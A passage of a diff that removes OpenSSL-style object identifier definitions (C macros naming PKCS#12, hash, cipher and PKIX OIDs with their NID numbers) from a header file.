-#define SN_pbe_WithSHA1And3_Key_TripleDES_CBC		"PBE-SHA1-3DES"
-#define LN_pbe_WithSHA1And3_Key_TripleDES_CBC		"pbeWithSHA1And3-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And3_Key_TripleDES_CBC		146
-#define OBJ_pbe_WithSHA1And3_Key_TripleDES_CBC		OBJ_pkcs12_pbeids,3L
-
-#define SN_pbe_WithSHA1And2_Key_TripleDES_CBC		"PBE-SHA1-2DES"
-#define LN_pbe_WithSHA1And2_Key_TripleDES_CBC		"pbeWithSHA1And2-KeyTripleDES-CBC"
-#define NID_pbe_WithSHA1And2_Key_TripleDES_CBC		147
-#define OBJ_pbe_WithSHA1And2_Key_TripleDES_CBC		OBJ_pkcs12_pbeids,4L
-
-#define SN_pbe_WithSHA1And128BitRC2_CBC		"PBE-SHA1-RC2-128"
-#define LN_pbe_WithSHA1And128BitRC2_CBC		"pbeWithSHA1And128BitRC2-CBC"
-#define NID_pbe_WithSHA1And128BitRC2_CBC		148
-#define OBJ_pbe_WithSHA1And128BitRC2_CBC		OBJ_pkcs12_pbeids,5L
-
-#define SN_pbe_WithSHA1And40BitRC2_CBC		"PBE-SHA1-RC2-40"
-#define LN_pbe_WithSHA1And40BitRC2_CBC		"pbeWithSHA1And40BitRC2-CBC"
-#define NID_pbe_WithSHA1And40BitRC2_CBC		149
-#define OBJ_pbe_WithSHA1And40BitRC2_CBC		OBJ_pkcs12_pbeids,6L
-
-#define OBJ_pkcs12_Version1		OBJ_pkcs12,10L
-
-#define OBJ_pkcs12_BagIds		OBJ_pkcs12_Version1,1L
-
-#define LN_keyBag		"keyBag"
-#define NID_keyBag		150
-#define OBJ_keyBag		OBJ_pkcs12_BagIds,1L
-
-#define LN_pkcs8ShroudedKeyBag		"pkcs8ShroudedKeyBag"
-#define NID_pkcs8ShroudedKeyBag		151
-#define OBJ_pkcs8ShroudedKeyBag		OBJ_pkcs12_BagIds,2L
-
-#define LN_certBag		"certBag"
-#define NID_certBag		152
-#define OBJ_certBag		OBJ_pkcs12_BagIds,3L
-
-#define LN_crlBag		"crlBag"
-#define NID_crlBag		153
-#define OBJ_crlBag		OBJ_pkcs12_BagIds,4L
-
-#define LN_secretBag		"secretBag"
-#define NID_secretBag		154
-#define OBJ_secretBag		OBJ_pkcs12_BagIds,5L
-
-#define LN_safeContentsBag		"safeContentsBag"
-#define NID_safeContentsBag		155
-#define OBJ_safeContentsBag		OBJ_pkcs12_BagIds,6L
-
-#define SN_md2		"MD2"
-#define LN_md2		"md2"
-#define NID_md2		3
-#define OBJ_md2		OBJ_rsadsi,2L,2L
-
-#define SN_md4		"MD4"
-#define LN_md4		"md4"
-#define NID_md4		257
-#define OBJ_md4		OBJ_rsadsi,2L,4L
-
-#define SN_md5		"MD5"
-#define LN_md5		"md5"
-#define NID_md5		4
-#define OBJ_md5		OBJ_rsadsi,2L,5L
-
-#define SN_md5_sha1		"MD5-SHA1"
-#define LN_md5_sha1		"md5-sha1"
-#define NID_md5_sha1		114
-
-#define LN_hmacWithMD5		"hmacWithMD5"
-#define NID_hmacWithMD5		797
-#define OBJ_hmacWithMD5		OBJ_rsadsi,2L,6L
-
-#define LN_hmacWithSHA1		"hmacWithSHA1"
-#define NID_hmacWithSHA1		163
-#define OBJ_hmacWithSHA1		OBJ_rsadsi,2L,7L
-
-#define LN_hmacWithSHA224		"hmacWithSHA224"
-#define NID_hmacWithSHA224		798
-#define OBJ_hmacWithSHA224		OBJ_rsadsi,2L,8L
-
-#define LN_hmacWithSHA256		"hmacWithSHA256"
-#define NID_hmacWithSHA256		799
-#define OBJ_hmacWithSHA256		OBJ_rsadsi,2L,9L
-
-#define LN_hmacWithSHA384		"hmacWithSHA384"
-#define NID_hmacWithSHA384		800
-#define OBJ_hmacWithSHA384		OBJ_rsadsi,2L,10L
-
-#define LN_hmacWithSHA512		"hmacWithSHA512"
-#define NID_hmacWithSHA512		801
-#define OBJ_hmacWithSHA512		OBJ_rsadsi,2L,11L
-
-#define SN_rc2_cbc		"RC2-CBC"
-#define LN_rc2_cbc		"rc2-cbc"
-#define NID_rc2_cbc		37
-#define OBJ_rc2_cbc		OBJ_rsadsi,3L,2L
-
-#define SN_rc2_ecb		"RC2-ECB"
-#define LN_rc2_ecb		"rc2-ecb"
-#define NID_rc2_ecb		38
-
-#define SN_rc2_cfb64		"RC2-CFB"
-#define LN_rc2_cfb64		"rc2-cfb"
-#define NID_rc2_cfb64		39
-
-#define SN_rc2_ofb64		"RC2-OFB"
-#define LN_rc2_ofb64		"rc2-ofb"
-#define NID_rc2_ofb64		40
-
-#define SN_rc2_40_cbc		"RC2-40-CBC"
-#define LN_rc2_40_cbc		"rc2-40-cbc"
-#define NID_rc2_40_cbc		98
-
-#define SN_rc2_64_cbc		"RC2-64-CBC"
-#define LN_rc2_64_cbc		"rc2-64-cbc"
-#define NID_rc2_64_cbc		166
-
-#define SN_rc4		"RC4"
-#define LN_rc4		"rc4"
-#define NID_rc4		5
-#define OBJ_rc4		OBJ_rsadsi,3L,4L
-
-#define SN_rc4_40		"RC4-40"
-#define LN_rc4_40		"rc4-40"
-#define NID_rc4_40		97
-
-#define SN_des_ede3_cbc		"DES-EDE3-CBC"
-#define LN_des_ede3_cbc		"des-ede3-cbc"
-#define NID_des_ede3_cbc		44
-#define OBJ_des_ede3_cbc		OBJ_rsadsi,3L,7L
-
-#define SN_rc5_cbc		"RC5-CBC"
-#define LN_rc5_cbc		"rc5-cbc"
-#define NID_rc5_cbc		120
-#define OBJ_rc5_cbc		OBJ_rsadsi,3L,8L
-
-#define SN_rc5_ecb		"RC5-ECB"
-#define LN_rc5_ecb		"rc5-ecb"
-#define NID_rc5_ecb		121
-
-#define SN_rc5_cfb64		"RC5-CFB"
-#define LN_rc5_cfb64		"rc5-cfb"
-#define NID_rc5_cfb64		122
-
-#define SN_rc5_ofb64		"RC5-OFB"
-#define LN_rc5_ofb64		"rc5-ofb"
-#define NID_rc5_ofb64		123
-
-#define SN_ms_ext_req		"msExtReq"
-#define LN_ms_ext_req		"Microsoft Extension Request"
-#define NID_ms_ext_req		171
-#define OBJ_ms_ext_req		1L,3L,6L,1L,4L,1L,311L,2L,1L,14L
-
-#define SN_ms_code_ind		"msCodeInd"
-#define LN_ms_code_ind		"Microsoft Individual Code Signing"
-#define NID_ms_code_ind		134
-#define OBJ_ms_code_ind		1L,3L,6L,1L,4L,1L,311L,2L,1L,21L
-
-#define SN_ms_code_com		"msCodeCom"
-#define LN_ms_code_com		"Microsoft Commercial Code Signing"
-#define NID_ms_code_com		135
-#define OBJ_ms_code_com		1L,3L,6L,1L,4L,1L,311L,2L,1L,22L
-
-#define SN_ms_ctl_sign		"msCTLSign"
-#define LN_ms_ctl_sign		"Microsoft Trust List Signing"
-#define NID_ms_ctl_sign		136
-#define OBJ_ms_ctl_sign		1L,3L,6L,1L,4L,1L,311L,10L,3L,1L
-
-#define SN_ms_sgc		"msSGC"
-#define LN_ms_sgc		"Microsoft Server Gated Crypto"
-#define NID_ms_sgc		137
-#define OBJ_ms_sgc		1L,3L,6L,1L,4L,1L,311L,10L,3L,3L
-
-#define SN_ms_efs		"msEFS"
-#define LN_ms_efs		"Microsoft Encrypted File System"
-#define NID_ms_efs		138
-#define OBJ_ms_efs		1L,3L,6L,1L,4L,1L,311L,10L,3L,4L
-
-#define SN_ms_smartcard_login		"msSmartcardLogin"
-#define LN_ms_smartcard_login		"Microsoft Smartcardlogin"
-#define NID_ms_smartcard_login		648
-#define OBJ_ms_smartcard_login		1L,3L,6L,1L,4L,1L,311L,20L,2L,2L
-
-#define SN_ms_upn		"msUPN"
-#define LN_ms_upn		"Microsoft Universal Principal Name"
-#define NID_ms_upn		649
-#define OBJ_ms_upn		1L,3L,6L,1L,4L,1L,311L,20L,2L,3L
-
-#define SN_idea_cbc		"IDEA-CBC"
-#define LN_idea_cbc		"idea-cbc"
-#define NID_idea_cbc		34
-#define OBJ_idea_cbc		1L,3L,6L,1L,4L,1L,188L,7L,1L,1L,2L
-
-#define SN_idea_ecb		"IDEA-ECB"
-#define LN_idea_ecb		"idea-ecb"
-#define NID_idea_ecb		36
-
-#define SN_idea_cfb64		"IDEA-CFB"
-#define LN_idea_cfb64		"idea-cfb"
-#define NID_idea_cfb64		35
-
-#define SN_idea_ofb64		"IDEA-OFB"
-#define LN_idea_ofb64		"idea-ofb"
-#define NID_idea_ofb64		46
-
-#define SN_bf_cbc		"BF-CBC"
-#define LN_bf_cbc		"bf-cbc"
-#define NID_bf_cbc		91
-#define OBJ_bf_cbc		1L,3L,6L,1L,4L,1L,3029L,1L,2L
-
-#define SN_bf_ecb		"BF-ECB"
-#define LN_bf_ecb		"bf-ecb"
-#define NID_bf_ecb		92
-
-#define SN_bf_cfb64		"BF-CFB"
-#define LN_bf_cfb64		"bf-cfb"
-#define NID_bf_cfb64		93
-
-#define SN_bf_ofb64		"BF-OFB"
-#define LN_bf_ofb64		"bf-ofb"
-#define NID_bf_ofb64		94
-
-#define SN_id_pkix		"PKIX"
-#define NID_id_pkix		127
-#define OBJ_id_pkix		1L,3L,6L,1L,5L,5L,7L
-
-#define SN_id_pkix_mod		"id-pkix-mod"
-#define NID_id_pkix_mod		258
-#define OBJ_id_pkix_mod		OBJ_id_pkix,0L
-
-#define SN_id_pe		"id-pe"
-#define NID_id_pe		175
-#define OBJ_id_pe		OBJ_id_pkix,1L
-
-#define SN_id_qt		"id-qt"
-#define NID_id_qt		259
-#define OBJ_id_qt		OBJ_id_pkix,2L
-
-#define SN_id_kp		"id-kp"
-#define NID_id_kp		128
-#define OBJ_id_kp		OBJ_id_pkix,3L
-
-#define SN_id_it		"id-it"
-#define NID_id_it		260
-#define OBJ_id_it		OBJ_id_pkix,4L
-
-#define SN_id_pkip		"id-pkip"
-#define NID_id_pkip		261
-#define OBJ_id_pkip		OBJ_id_pkix,5L
-
-#define SN_id_alg		"id-alg"
-#define NID_id_alg		262
-#define OBJ_id_alg		OBJ_id_pkix,6L
-
-#define SN_id_cmc		"id-cmc"
-#define NID_id_cmc		263
-#define OBJ_id_cmc		OBJ_id_pkix,7L
-
-#define SN_id_on		"id-on"
-#define NID_id_on		264
-#define OBJ_id_on		OBJ_id_pkix,8L
-
-#define SN_id_pda		"id-pda"
-#define NID_id_pda		265
-#define OBJ_id_pda		OBJ_id_pkix,9L
-
-#define SN_id_aca		"id-aca"
-#define NID_id_aca		266
-#define OBJ_id_aca		OBJ_id_pkix,10L
-
-#define SN_id_qcs		"id-qcs"
-#define NID_id_qcs		267
-#define OBJ_id_qcs		OBJ_id_pkix,11L
-
-#define SN_id_cct		"id-cct"
-#define NID_id_cct		268
-#define OBJ_id_cct		OBJ_id_pkix,12L
-
-#define SN_id_ppl		"id-ppl"
-#define NID_id_ppl		662
-#define OBJ_id_ppl		OBJ_id_pkix,21L
-
-#define SN_id_ad		"id-ad"
-#define NID_id_ad		176
-#define OBJ_id_ad		OBJ_id_pkix,48L
-
-#define SN_id_pkix1_explicit_88		"id-pkix1-explicit-88"
-#define NID_id_pkix1_explicit_88		269
-#define OBJ_id_pkix1_explicit_88		OBJ_id_pkix_mod,1L
-
-#define SN_id_pkix1_implicit_88		"id-pkix1-implicit-88"
-#define NID_id_pkix1_implicit_88		270
-#define OBJ_id_pkix1_implicit_88		OBJ_id_pkix_mod,2L
-
-#define SN_id_pkix1_explicit_93		"id-pkix1-explicit-93"
-#define NID_id_pkix1_explicit_93		271
-#define OBJ_id_pkix1_explicit_93		OBJ_id_pkix_mod,3L
-
-#define SN_id_pkix1_implicit_93		"id-pkix1-implicit-93"
-#define NID_id_pkix1_implicit_93		272
-#define OBJ_id_pkix1_implicit_93		OBJ_id_pkix_mod,4L
-
-#define SN_id_mod_crmf		"id-mod-crmf"
-#define NID_id_mod_crmf		273
-#define OBJ_id_mod_crmf		OBJ_id_pkix_mod,5L
-
-#define SN_id_mod_cmc		"id-mod-cmc"
-#define NID_id_mod_cmc		274
-#define OBJ_id_mod_cmc		OBJ_id_pkix_mod,6L
-
-#define SN_id_mod_kea_profile_88		"id-mod-kea-profile-88"
-#define NID_id_mod_kea_profile_88		275
-#define OBJ_id_mod_kea_profile_88		OBJ_id_pkix_mod,7L
-
-#define SN_id_mod_kea_profile_93		"id-mod-kea-profile-93"
-#define NID_id_mod_kea_profile_93		276
-#define OBJ_id_mod_kea_profile_93		OBJ_id_pkix_mod,8L
-
-#define SN_id_mod_cmp		"id-mod-cmp"
-#define NID_id_mod_cmp		277
-#define OBJ_id_mod_cmp		OBJ_id_pkix_mod,9L
-
-#define SN_id_mod_qualified_cert_88		"id-mod-qualified-cert-88"
-#define NID_id_mod_qualified_cert_88		278
-#define OBJ_id_mod_qualified_cert_88		OBJ_id_pkix_mod,10L
-
-#define SN_id_mod_qualified_cert_93		"id-mod-qualified-cert-93"
-#define NID_id_mod_qualified_cert_93		279
-#define OBJ_id_mod_qualified_cert_93		OBJ_id_pkix_mod,11L
-
-#define SN_id_mod_attribute_cert		"id-mod-attribute-cert"
-#define NID_id_mod_attribute_cert		280
-#define OBJ_id_mod_attribute_cert		OBJ_id_pkix_mod,12L
-
-#define SN_id_mod_timestamp_protocol		"id-mod-timestamp-protocol"
-#define NID_id_mod_timestamp_protocol		281
-#define OBJ_id_mod_timestamp_protocol		OBJ_id_pkix_mod,13L
-
-#define SN_id_mod_ocsp		"id-mod-ocsp"
-#define NID_id_mod_ocsp		282
-#define OBJ_id_mod_ocsp		OBJ_id_pkix_mod,14L
-
-#define SN_id_mod_dvcs		"id-mod-dvcs"
-#define NID_id_mod_dvcs		283
-#define OBJ_id_mod_dvcs		OBJ_id_pkix_mod,15L
-
-#define SN_id_mod_cmp2000		"id-mod-cmp2000"
-#define NID_id_mod_cmp2000		284
-#define OBJ_id_mod_cmp2000		OBJ_id_pkix_mod,16L
-
-#define SN_info_access		"authorityInfoAccess"
-#define LN_info_access		"Authority Information Access"
-#define NID_info_access		177
-#define OBJ_info_access		OBJ_id_pe,1L
-
-#define SN_biometricInfo		"biometricInfo"
-#define LN_biometricInfo		"Biometric Info"
-#define NID_biometricInfo		285
-#define OBJ_biometricInfo		OBJ_id_pe,2L
-
-#define SN_qcStatements		"qcStatements"
-#define NID_qcStatements		286
-#define OBJ_qcStatements		OBJ_id_pe,3L
-
-#define SN_ac_auditEntity		"ac-auditEntity"
-#define NID_ac_auditEntity		287
-#define OBJ_ac_auditEntity		OBJ_id_pe,4L
-
-#define SN_ac_targeting		"ac-targeting"
-#define NID_ac_targeting		288
-#define OBJ_ac_targeting		OBJ_id_pe,5L
-
-#define SN_aaControls		"aaControls"
-#define NID_aaControls		289
-#define OBJ_aaControls		OBJ_id_pe,6L
-
-#define SN_sbgp_ipAddrBlock		"sbgp-ipAddrBlock"
-#define NID_sbgp_ipAddrBlock		290
-#define OBJ_sbgp_ipAddrBlock		OBJ_id_pe,7L
-
-#define SN_sbgp_autonomousSysNum		"sbgp-autonomousSysNum"
-#define NID_sbgp_autonomousSysNum		291
-#define OBJ_sbgp_autonomousSysNum		OBJ_id_pe,8L
-
-#define SN_sbgp_routerIdentifier		"sbgp-routerIdentifier"
-#define NID_sbgp_routerIdentifier		292
-#define OBJ_sbgp_routerIdentifier		OBJ_id_pe,9L
-
-#define SN_ac_proxying		"ac-proxying"
-#define NID_ac_proxying		397
-#define OBJ_ac_proxying		OBJ_id_pe,10L
-
-#define SN_sinfo_access		"subjectInfoAccess"
-#define LN_sinfo_access		"Subject Information Access"
-#define NID_sinfo_access		398
-#define OBJ_sinfo_access		OBJ_id_pe,11L
-
-#define SN_proxyCertInfo		"proxyCertInfo"
-#define LN_proxyCertInfo		"Proxy Certificate Information"
-#define NID_proxyCertInfo		663
-#define OBJ_proxyCertInfo		OBJ_id_pe,14L
-
-#define SN_id_qt_cps		"id-qt-cps"
-#define LN_id_qt_cps		"Policy Qualifier CPS"
-#define NID_id_qt_cps		164
-#define OBJ_id_qt_cps		OBJ_id_qt,1L
-
-#define SN_id_qt_unotice		"id-qt-unotice"
-#define LN_id_qt_unotice		"Policy Qualifier User Notice"
-#define NID_id_qt_unotice		165
-#define OBJ_id_qt_unotice		OBJ_id_qt,2L
-
-#define SN_textNotice		"textNotice"
-#define NID_textNotice		293
-#define OBJ_textNotice		OBJ_id_qt,3L
-
-#define SN_server_auth		"serverAuth"
-#define LN_server_auth		"TLS Web Server Authentication"
-#define NID_server_auth		129
-#define OBJ_server_auth		OBJ_id_kp,1L
-
-#define SN_client_auth		"clientAuth"
-#define LN_client_auth		"TLS Web Client Authentication"
-#define NID_client_auth		130
-#define OBJ_client_auth		OBJ_id_kp,2L
-
-#define SN_code_sign		"codeSigning"
-#define LN_code_sign		"Code Signing"
-#define NID_code_sign		131
-#define OBJ_code_sign		OBJ_id_kp,3L
-
-#define SN_email_protect		"emailProtection"
-#define LN_email_protect		"E-mail Protection"
-#define NID_email_protect		132
-#define OBJ_email_protect		OBJ_id_kp,4L
-
-#define SN_ipsecEndSystem		"ipsecEndSystem"
-#define LN_ipsecEndSystem		"IPSec End System"
-#define NID_ipsecEndSystem		294
-#define OBJ_ipsecEndSystem		OBJ_id_kp,5L
-
-#define SN_ipsecTunnel		"ipsecTunnel"
-#define LN_ipsecTunnel		"IPSec Tunnel"
-#define NID_ipsecTunnel		295
-#define OBJ_ipsecTunnel		OBJ_id_kp,6L
-
-#define SN_ipsecUser		"ipsecUser"
-#define LN_ipsecUser		"IPSec User"
-#define NID_ipsecUser		296
-#define OBJ_ipsecUser		OBJ_id_kp,7L
-
-#define SN_time_stamp		"timeStamping"
-#define LN_time_stamp		"Time Stamping"
-#define NID_time_stamp		133
-#define OBJ_time_stamp		OBJ_id_kp,8L
-
-#define SN_OCSP_sign		"OCSPSigning"
-#define LN_OCSP_sign		"OCSP Signing"
-#define NID_OCSP_sign		180
-#define OBJ_OCSP_sign		OBJ_id_kp,9L
-
-#define SN_dvcs		"DVCS"
-#define LN_dvcs		"dvcs"
-#define NID_dvcs		297
-#define OBJ_dvcs		OBJ_id_kp,10L
-
-#define SN_id_it_caProtEncCert		"id-it-caProtEncCert"
-#define NID_id_it_caProtEncCert		298
-#define OBJ_id_it_caProtEncCert		OBJ_id_it,1L
-
-#define SN_id_it_signKeyPairTypes		"id-it-signKeyPairTypes"
-#define NID_id_it_signKeyPairTypes		299
-#define OBJ_id_it_signKeyPairTypes		OBJ_id_it,2L
-
-#define SN_id_it_encKeyPairTypes		"id-it-encKeyPairTypes"
-#define NID_id_it_encKeyPairTypes		300
-#define OBJ_id_it_encKeyPairTypes		OBJ_id_it,3L
-
-#define SN_id_it_preferredSymmAlg		"id-it-preferredSymmAlg"
-#define NID_id_it_preferredSymmAlg		301
-#define OBJ_id_it_preferredSymmAlg		OBJ_id_it,4L
-
-#define SN_id_it_caKeyUpdateInfo		"id-it-caKeyUpdateInfo"
-#define NID_id_it_caKeyUpdateInfo		302
-#define OBJ_id_it_caKeyUpdateInfo		OBJ_id_it,5L
-
-#define SN_id_it_currentCRL		"id-it-currentCRL"
-#define NID_id_it_currentCRL		303
-#define OBJ_id_it_currentCRL		OBJ_id_it,6L
-
-#define SN_id_it_unsupportedOIDs		"id-it-unsupportedOIDs"
-#define NID_id_it_unsupportedOIDs		304
-#define OBJ_id_it_unsupportedOIDs		OBJ_id_it,7L
-
-#define SN_id_it_subscriptionRequest		"id-it-subscriptionRequest"
-#define NID_id_it_subscriptionRequest		305
-#define OBJ_id_it_subscriptionRequest		OBJ_id_it,8L
-
-#define SN_id_it_subscriptionResponse		"id-it-subscriptionResponse"
-#define NID_id_it_subscriptionResponse		306
-#define OBJ_id_it_subscriptionResponse		OBJ_id_it,9L
-
-#define SN_id_it_keyPairParamReq		"id-it-keyPairParamReq"
-#define NID_id_it_keyPairParamReq		307
-#define OBJ_id_it_keyPairParamReq		OBJ_id_it,10L
-
-#define SN_id_it_keyPairParamRep		"id-it-keyPairParamRep"
-#define NID_id_it_keyPairParamRep		308
-#define OBJ_id_it_keyPairParamRep		OBJ_id_it,11L
-
-#define SN_id_it_revPassphrase		"id-it-revPassphrase"
-#define NID_id_it_revPassphrase		309
-#define OBJ_id_it_revPassphrase		OBJ_id_it,12L
-
-#define SN_id_it_implicitConfirm		"id-it-implicitConfirm"
-#define NID_id_it_implicitConfirm		310
-#define OBJ_id_it_implicitConfirm		OBJ_id_it,13L
-
-#define SN_id_it_confirmWaitTime		"id-it-confirmWaitTime"
-#define NID_id_it_confirmWaitTime		311
-#define OBJ_id_it_confirmWaitTime		OBJ_id_it,14L
-
-#define SN_id_it_origPKIMessage		"id-it-origPKIMessage"
-#define NID_id_it_origPKIMessage		312
-#define OBJ_id_it_origPKIMessage		OBJ_id_it,15L
-
-#define SN_id_it_suppLangTags		"id-it-suppLangTags"
-#define NID_id_it_suppLangTags		784
-#define OBJ_id_it_suppLangTags		OBJ_id_it,16L
-
-#define SN_id_regCtrl		"id-regCtrl"
-#define NID_id_regCtrl		313
-#define OBJ_id_regCtrl		OBJ_id_pkip,1L
-
-#define SN_id_regInfo		"id-regInfo"
-#define NID_id_regInfo		314
-#define OBJ_id_regInfo		OBJ_id_pkip,2L
-
-#define SN_id_regCtrl_regToken		"id-regCtrl-regToken"
-#define NID_id_regCtrl_regToken		315
-#define OBJ_id_regCtrl_regToken		OBJ_id_regCtrl,1L
-
-#define SN_id_regCtrl_authenticator		"id-regCtrl-authenticator"
-#define NID_id_regCtrl_authenticator		316
-#define OBJ_id_regCtrl_authenticator		OBJ_id_regCtrl,2L
-
-#define SN_id_regCtrl_pkiPublicationInfo		"id-regCtrl-pkiPublicationInfo"
-#define NID_id_regCtrl_pkiPublicationInfo		317
-#define OBJ_id_regCtrl_pkiPublicationInfo		OBJ_id_regCtrl,3L
-
-#define SN_id_regCtrl_pkiArchiveOptions		"id-regCtrl-pkiArchiveOptions"
-#define NID_id_regCtrl_pkiArchiveOptions		318
-#define OBJ_id_regCtrl_pkiArchiveOptions		OBJ_id_regCtrl,4L
-
-#define SN_id_regCtrl_oldCertID		"id-regCtrl-oldCertID"
-#define NID_id_regCtrl_oldCertID		319
-#define OBJ_id_regCtrl_oldCertID		OBJ_id_regCtrl,5L
-
-#define SN_id_regCtrl_protocolEncrKey		"id-regCtrl-protocolEncrKey"
-#define NID_id_regCtrl_protocolEncrKey		320
-#define OBJ_id_regCtrl_protocolEncrKey		OBJ_id_regCtrl,6L
-
-#define SN_id_regInfo_utf8Pairs		"id-regInfo-utf8Pairs"
-#define NID_id_regInfo_utf8Pairs		321
-#define OBJ_id_regInfo_utf8Pairs		OBJ_id_regInfo,1L
-
-#define SN_id_regInfo_certReq		"id-regInfo-certReq"
-#define NID_id_regInfo_certReq		322
-#define OBJ_id_regInfo_certReq		OBJ_id_regInfo,2L
-
-#define SN_id_alg_des40		"id-alg-des40"
-#define NID_id_alg_des40		323
-#define OBJ_id_alg_des40		OBJ_id_alg,1L
-
-#define SN_id_alg_noSignature		"id-alg-noSignature"
-#define NID_id_alg_noSignature		324
-#define OBJ_id_alg_noSignature		OBJ_id_alg,2L
-
-#define SN_id_alg_dh_sig_hmac_sha1		"id-alg-dh-sig-hmac-sha1"
-#define NID_id_alg_dh_sig_hmac_sha1		325
-#define OBJ_id_alg_dh_sig_hmac_sha1		OBJ_id_alg,3L
-
-#define SN_id_alg_dh_pop		"id-alg-dh-pop"
-#define NID_id_alg_dh_pop		326
-#define OBJ_id_alg_dh_pop		OBJ_id_alg,4L
-
-#define SN_id_cmc_statusInfo		"id-cmc-statusInfo"
-#define NID_id_cmc_statusInfo		327
-#define OBJ_id_cmc_statusInfo		OBJ_id_cmc,1L
-
-#define SN_id_cmc_identification		"id-cmc-identification"
-#define NID_id_cmc_identification		328
-#define OBJ_id_cmc_identification		OBJ_id_cmc,2L
-
-#define SN_id_cmc_identityProof		"id-cmc-identityProof"
-#define NID_id_cmc_identityProof		329
-#define OBJ_id_cmc_identityProof		OBJ_id_cmc,3L
-
-#define SN_id_cmc_dataReturn		"id-cmc-dataReturn"
-#define NID_id_cmc_dataReturn		330
-#define OBJ_id_cmc_dataReturn		OBJ_id_cmc,4L
-
-#define SN_id_cmc_transactionId		"id-cmc-transactionId"
-#define NID_id_cmc_transactionId		331
-#define OBJ_id_cmc_transactionId		OBJ_id_cmc,5L
-
-#define SN_id_cmc_senderNonce		"id-cmc-senderNonce"
-#define NID_id_cmc_senderNonce		332
-#define OBJ_id_cmc_senderNonce		OBJ_id_cmc,6L
-
-#define SN_id_cmc_recipientNonce		"id-cmc-recipientNonce"
-#define NID_id_cmc_recipientNonce		333
-#define OBJ_id_cmc_recipientNonce		OBJ_id_cmc,7L
-
-#define SN_id_cmc_addExtensions		"id-cmc-addExtensions"
-#define NID_id_cmc_addExtensions		334
-#define OBJ_id_cmc_addExtensions		OBJ_id_cmc,8L
-
-#define SN_id_cmc_encryptedPOP		"id-cmc-encryptedPOP"
-#define NID_id_cmc_encryptedPOP		335
-#define OBJ_id_cmc_encryptedPOP		OBJ_id_cmc,9L
-
-#define SN_id_cmc_decryptedPOP		"id-cmc-decryptedPOP"
-#define NID_id_cmc_decryptedPOP		336
-#define OBJ_id_cmc_decryptedPOP		OBJ_id_cmc,10L
-
-#define SN_id_cmc_lraPOPWitness		"id-cmc-lraPOPWitness"
-#define NID_id_cmc_lraPOPWitness		337
-#define OBJ_id_cmc_lraPOPWitness		OBJ_id_cmc,11L
-
-#define SN_id_cmc_getCert		"id-cmc-getCert"
-#define NID_id_cmc_getCert		338
-#define OBJ_id_cmc_getCert		OBJ_id_cmc,15L
-
-#define SN_id_cmc_getCRL		"id-cmc-getCRL"
-#define NID_id_cmc_getCRL		339
-#define OBJ_id_cmc_getCRL		OBJ_id_cmc,16L
-
-#define SN_id_cmc_revokeRequest		"id-cmc-revokeRequest"
-#define NID_id_cmc_revokeRequest		340
-#define OBJ_id_cmc_revokeRequest		OBJ_id_cmc,17L
-
-#define SN_id_cmc_regInfo		"id-cmc-regInfo"
-#define NID_id_cmc_regInfo		341
-#define OBJ_id_cmc_regInfo		OBJ_id_cmc,18L
-
-#define SN_id_cmc_responseInfo		"id-cmc-responseInfo"
-#define NID_id_cmc_responseInfo		342
-#define OBJ_id_cmc_responseInfo		OBJ_id_cmc,19L
-
-#define SN_id_cmc_queryPending		"id-cmc-queryPending"
-#define NID_id_cmc_queryPending		343
-#define OBJ_id_cmc_queryPending		OBJ_id_cmc,21L
-
-#define SN_id_cmc_popLinkRandom		"id-cmc-popLinkRandom"
-#define NID_id_cmc_popLinkRandom		344
-#define OBJ_id_cmc_popLinkRandom		OBJ_id_cmc,22L
-
-#define SN_id_cmc_popLinkWitness		"id-cmc-popLinkWitness"
-#define NID_id_cmc_popLinkWitness		345
-#define OBJ_id_cmc_popLinkWitness		OBJ_id_cmc,23L
-
-#define SN_id_cmc_confirmCertAcceptance		"id-cmc-confirmCertAcceptance"
-#define NID_id_cmc_confirmCertAcceptance		346
-#define OBJ_id_cmc_confirmCertAcceptance		OBJ_id_cmc,24L
-
-#define SN_id_on_personalData		"id-on-personalData"
-#define NID_id_on_personalData		347
-#define OBJ_id_on_personalData		OBJ_id_on,1L
-
-#define SN_id_on_permanentIdentifier		"id-on-permanentIdentifier"
-#define LN_id_on_permanentIdentifier		"Permanent Identifier"
-#define NID_id_on_permanentIdentifier		858
-#define OBJ_id_on_permanentIdentifier		OBJ_id_on,3L
-
-#define SN_id_pda_dateOfBirth		"id-pda-dateOfBirth"
-#define NID_id_pda_dateOfBirth		348
-#define OBJ_id_pda_dateOfBirth		OBJ_id_pda,1L
-
-#define SN_id_pda_placeOfBirth		"id-pda-placeOfBirth"
-#define NID_id_pda_placeOfBirth		349
-#define OBJ_id_pda_placeOfBirth		OBJ_id_pda,2L
-
-#define SN_id_pda_gender		"id-pda-gender"
-#define NID_id_pda_gender		351
-#define OBJ_id_pda_gender		OBJ_id_pda,3L
-
-#define SN_id_pda_countryOfCitizenship		"id-pda-countryOfCitizenship"
-#define NID_id_pda_countryOfCitizenship		352
-#define OBJ_id_pda_countryOfCitizenship		OBJ_id_pda,4L
-
-#define SN_id_pda_countryOfResidence		"id-pda-countryOfResidence"
-#define NID_id_pda_countryOfResidence		353
-#define OBJ_id_pda_countryOfResidence		OBJ_id_pda,5L
-
-#define SN_id_aca_authenticationInfo		"id-aca-authenticationInfo"
-#define NID_id_aca_authenticationInfo		354
-#define OBJ_id_aca_authenticationInfo		OBJ_id_aca,1L
-
-#define SN_id_aca_accessIdentity		"id-aca-accessIdentity"
-#define NID_id_aca_accessIdentity		355
-#define OBJ_id_aca_accessIdentity		OBJ_id_aca,2L
-
-#define SN_id_aca_chargingIdentity		"id-aca-chargingIdentity"
-#define NID_id_aca_chargingIdentity		356
-#define OBJ_id_aca_chargingIdentity		OBJ_id_aca,3L
-
-#define SN_id_aca_group		"id-aca-group"
-#define NID_id_aca_group		357
-#define OBJ_id_aca_group		OBJ_id_aca,4L
-
-#define SN_id_aca_role		"id-aca-role"
-#define NID_id_aca_role		358
-#define OBJ_id_aca_role		OBJ_id_aca,5L
-
-#define SN_id_aca_encAttrs		"id-aca-encAttrs"
-#define NID_id_aca_encAttrs		399
-#define OBJ_id_aca_encAttrs		OBJ_id_aca,6L
-
-#define SN_id_qcs_pkixQCSyntax_v1		"id-qcs-pkixQCSyntax-v1"
-#define NID_id_qcs_pkixQCSyntax_v1		359
-#define OBJ_id_qcs_pkixQCSyntax_v1		OBJ_id_qcs,1L
-
-#define SN_id_cct_crs		"id-cct-crs"
-#define NID_id_cct_crs		360
-#define OBJ_id_cct_crs		OBJ_id_cct,1L
-
-#define SN_id_cct_PKIData		"id-cct-PKIData"
-#define NID_id_cct_PKIData		361
